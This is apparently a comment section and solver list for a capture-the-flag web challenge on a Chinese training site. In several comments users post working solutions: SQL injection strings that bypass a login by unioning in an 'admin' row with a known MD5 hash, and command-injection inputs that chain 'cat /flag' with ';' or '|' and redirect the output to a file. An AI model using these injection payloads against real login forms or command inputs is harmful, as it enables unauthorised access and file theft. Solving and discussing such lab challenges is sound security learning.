评分(10)
解题动态
xuyuyan999 攻破了该题 17小时前
anton_小金鱼 攻破了该题 22小时前
zuaiyio 攻破了该题 1天前
1166 攻破了该题 1天前
提姆邓肯 攻破了该题 2天前
不想吃肥肉 攻破了该题 2天前
xym 攻破了该题 2天前
BugKuYali 攻破了该题 2天前
malajiba 攻破了该题 2天前
lappland 攻破了该题 2天前
Kernel1 攻破了该题 3天前
hds 攻破了该题 3天前
bugfuck2 攻破了该题 3天前
kyzz 攻破了该题 4天前
依旧是偏爱 攻破了该题 4天前
JFeng2048 攻破了该题 4天前
wujita01 攻破了该题 5天前
小崔 攻破了该题 5天前
249190331 攻破了该题 5天前
评论
zhuizhui 9月前
举报
' UNION SELECT 'admin' , '99754106633f94d350db34d548d6091a' FROM DUAL;#-- 123;cat /flag > test
nihaozy 11月前
举报
学会了一个英语单词tip提示
zpxlz 6月前
举报
那很会学习了
DoubleUUU 1年前
举报
一顿sqlmap半小时,deepseek秒给payload:username = ' UNION SELECT "admin","202cb962ac59075b964b07152d234b70" -- &password = 123
liuguowang75 1年前
举报
登陆后,在检验窗口中输入:123 | ls / > a.txt ,可以看到用户目录中所有文件,
sunset2004 1年前
举报
username=admin' union select 1,md5(123)#&password=123,union生成临时表将md5后的123到表里,然后密码输入123即可绕过。RCE直接通过重定向符号即可,将无回显的结果保存到a.txt里即可,123 | cat ../../../../flag > a.txt
Zhou_re-pwn 1年前
举报
没太看懂这题出的啥意思,进入监控系统后,和wp的绕过一模一样,结果回显没有显示
Yoruko39 1年前
举报
sql注入+RCE,但主要是代码审计,进入命令界面后,发现可以用;截断执行命令,但无回显。 可以用重定向符,将执行结果输出到文件中,再访问/a.txt即可,例如可以;cat * > a.txt,此时可以看到当前目录下所有文件,审计发现flag在一个宏变量$FLAG里,echo到文件即可
toonavy 1年前
举报
进程监控系统 输入需要检测的服务 ,退币!!!
Zhumeng 1年前
举报
这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag
Zhumeng 1年前
举报
这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag